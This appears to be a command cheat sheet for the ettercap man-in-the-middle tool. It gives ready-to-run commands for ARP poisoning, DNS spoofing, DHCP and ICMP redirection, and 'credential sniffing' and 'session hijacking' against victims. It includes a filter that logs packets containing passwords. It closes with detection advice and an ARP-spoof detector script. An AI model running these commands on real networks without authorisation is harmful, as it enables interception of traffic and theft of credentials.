ettercap

Ettercap is a comprehensive suite for man-in-the-middle (MITM) attacks on a LAN. It features sniffing of live connections, content filtering, and support for active and passive dissection of many protocols.

Basic Syntax

ettercap [options] [target1] [target2]

Modes

| Mode   | Flag | Description             |
| ------ | ---- | ----------------------- |
| Text   | -T   | Text-only interface     |
| Curses | -C   | Curses-based GUI        |
| GTK    | -G   | GTK graphical interface |
| Daemon | -D   | Run as daemon           |

Target Specification

Targets are written as MAC/IPs/PORTs, or MAC/IPs/IPv6/PORTs on builds with IPv6 support (one extra slash, which is why the ARP examples below use /// for "everything"). An empty field matches anything.

Examples:

  • // - All hosts
  • /192.168.1.1// - Single IP
  • /192.168.1.1-50// - IP range
  • /192.168.1.0/24// - Subnet
  • //80 - All hosts on port 80
  • /192.168.1.1//21,22,23 - Specific ports

Common Options

| Option      | Description                     |
| ----------- | ------------------------------- |
| -i <iface>  | Network interface               |
| -T          | Text mode                       |
| -G          | GTK GUI mode                    |
| -M <method> | MITM attack method              |
| -P <plugin> | Activate plugin                 |
| -F <file>   | Load filter from file           |
| -w <file>   | Write pcap file                 |
| -r <file>   | Read from pcap file             |
| -q          | Quiet mode (no packet content)  |
| -s <cmd>    | Execute command at startup      |
| -L <file>   | Log all traffic to file         |

ARP Poisoning

# Basic ARP poisoning (MITM between target and gateway)
ettercap -T -q -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# ARP poison entire subnet
ettercap -T -q -i eth0 -M arp:remote /// ///

# ARP poisoning with GUI
ettercap -G -i eth0 -M arp:remote /192.168.1.100// /192.168.1.1//

# One-way ARP poisoning
ettercap -T -q -i eth0 -M arp:oneway /192.168.1.100// /192.168.1.1//

DNS Spoofing

Step 1: Edit /etc/ettercap/etter.dns

# Redirect domain to attacker IP
example.com      A   192.168.1.50
*.example.com    A   192.168.1.50

# Redirect specific subdomain
mail.target.com  A   192.168.1.50

Step 2: Run Ettercap with DNS Plugin

# DNS spoofing with ARP poisoning
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

# GUI mode
ettercap -G -i eth0 -P dns_spoof -M arp:remote /192.168.1.100// /192.168.1.1//

MITM Attack Methods

# ARP poisoning
ettercap -T -M arp:remote /target1// /target2//

# ICMP redirect
ettercap -T -M icmp:00:11:22:33:44:55/192.168.1.1

# DHCP spoofing
ettercap -T -M dhcp:192.168.1.100-200/255.255.255.0/192.168.1.1

# Port stealing
ettercap -T -M port /target1// /target2//

# NDP poisoning (IPv6)
ettercap -T -M ndp:remote /target1// /target2//

Sniffing Modes

# Unified sniffing (single interface)
ettercap -T -i eth0

# Bridged sniffing (two interfaces)
ettercap -T -i eth0 -B eth1

# Read from pcap file
ettercap -T -r capture.pcap

# Write to pcap file
ettercap -T -i eth0 -w output.pcap

Plugins

# List available plugins
ettercap -T -P list

# Common plugins
ettercap -T -P dns_spoof -M arp:remote /// ///
ettercap -T -P remote_browser -M arp:remote /// ///
ettercap -T -P find_conn -M arp:remote /// ///
ettercap -T -P finger -M arp:remote /// ///

| Plugin         | Description                   |
| -------------- | ----------------------------- |
| dns_spoof      | DNS spoofing                  |
| remote_browser | Send visited URLs to browser  |
| find_conn      | Find connections              |
| finger         | OS fingerprinting             |
| gw_discover    | Find gateway                  |
| search_promisc | Find promiscuous NICs         |
| sslstrip       | Strip SSL (legacy)            |
| autoadd        | Auto add new hosts            |

Filters

Create a Filter (example.filter)

# Log packets containing a specific string
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "password")) {
      log(DATA.data, "/tmp/passwords.log");
   }
}

# Replace content
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}

# Drop packets
if (ip.src == '192.168.1.100') {
   drop();
   msg("Packet dropped\n");
}

Compile and Use Filter

# Compile filter
etterfilter example.filter -o example.ef

# Use compiled filter
ettercap -T -q -i eth0 -F example.ef -M arp:remote /// ///

Host Discovery

# Scan for hosts
ettercap -T -i eth0

# In interactive (text) mode, press:
# 'h' - help
# 'l' - view host list
# 's' - stop/start sniffing

Logging

# Log to file
ettercap -T -i eth0 -L logfile

# Creates logfile.eci (connection info) and logfile.ecp (packets)

# View logs
etterlog logfile.eci
etterlog -p logfile.ecp

Configuration Files

| File                       | Purpose              |
| -------------------------- | -------------------- |
| /etc/ettercap/etter.conf   | Main configuration   |
| /etc/ettercap/etter.dns    | DNS spoofing entries |
| /etc/ettercap/etter.filter | Example filters      |

Important etter.conf Settings

# Port redirection commands used by the SSL dissector (uncomment the pair for your firewall)
# Linux
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# Set UID/GID to run as non-root
ec_uid = 65534
ec_gid = 65534

Interactive Commands

| Key   | Action               |
| ----- | -------------------- |
| h     | Help                 |
| q     | Quit                 |
| p     | List plugins         |
| P     | Activate plugin      |
| l     | List hosts           |
| s     | Start/stop sniffing  |
| o     | Show profiles        |
| c     | Show connections     |
| SPACE | Stop scrolling       |

Common Attack Scenarios

Credential Sniffing

ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Session Hijacking

ettercap -T -q -i eth0 -M arp:remote -P remote_browser /victim// /gateway//

SSL Stripping (Legacy)

# Requires sslstrip or similar tool running
ettercap -T -q -i eth0 -M arp:remote /victim// /gateway//

Detection and Countermeasures

# Detect other sniffers
ettercap -T -P search_promisc

# Detect ARP spoofing
arpwatch
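As an added example (not from this page or the ettercap project), a minimal ARP-spoof detector in the spirit of arpwatch: it consumes constructed ARP-reply records and flags the two symptoms that ARP poisoning with arp:remote produces, an IP whose MAC binding changes and one MAC answering for several IPs. All addresses and timestamps are constructed sample values.

```python
"""Minimal ARP-spoof detector (added example, not ettercap code).

Input records are (seconds, sender IP, sender MAC) tuples, the same
information arpwatch derives from ARP replies on the wire.
"""
from collections import defaultdict

# Constructed sample replies: a gateway and a victim learn their real
# bindings, then a third NIC starts answering for both of them.
SAMPLE_REPLIES = [
    (0, "192.168.1.1", "aa:aa:aa:aa:aa:01"),     # gateway, legitimate
    (1, "192.168.1.100", "aa:aa:aa:aa:aa:64"),   # victim, legitimate
    (30, "192.168.1.1", "cc:cc:cc:cc:cc:cc"),    # gateway re-bound to new MAC
    (30, "192.168.1.100", "cc:cc:cc:cc:cc:cc"),  # same MAC also claims victim
]


def detect_arp_spoof(replies):
    """Return a list of alert strings, one per suspicious binding change."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        # Symptom 1: an IP we already know suddenly answers from another MAC
        if prev is not None and prev != mac:
            alerts.append(f"t={ts}s: {ip} changed MAC {prev} -> {mac}")
        ip_to_mac[ip] = mac
        # Symptom 2: a single MAC accumulating several IPs (victim + gateway)
        claimed = mac_to_ips[mac]
        if ip not in claimed:
            claimed.add(ip)
            if len(claimed) > 1:
                alerts.append(f"t={ts}s: {mac} now claims {sorted(claimed)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_REPLIES):
        print(line)
```

Static ARP entries for the gateway, or switch-side Dynamic ARP Inspection, stop the binding from changing in the first place; this script only tells you it happened.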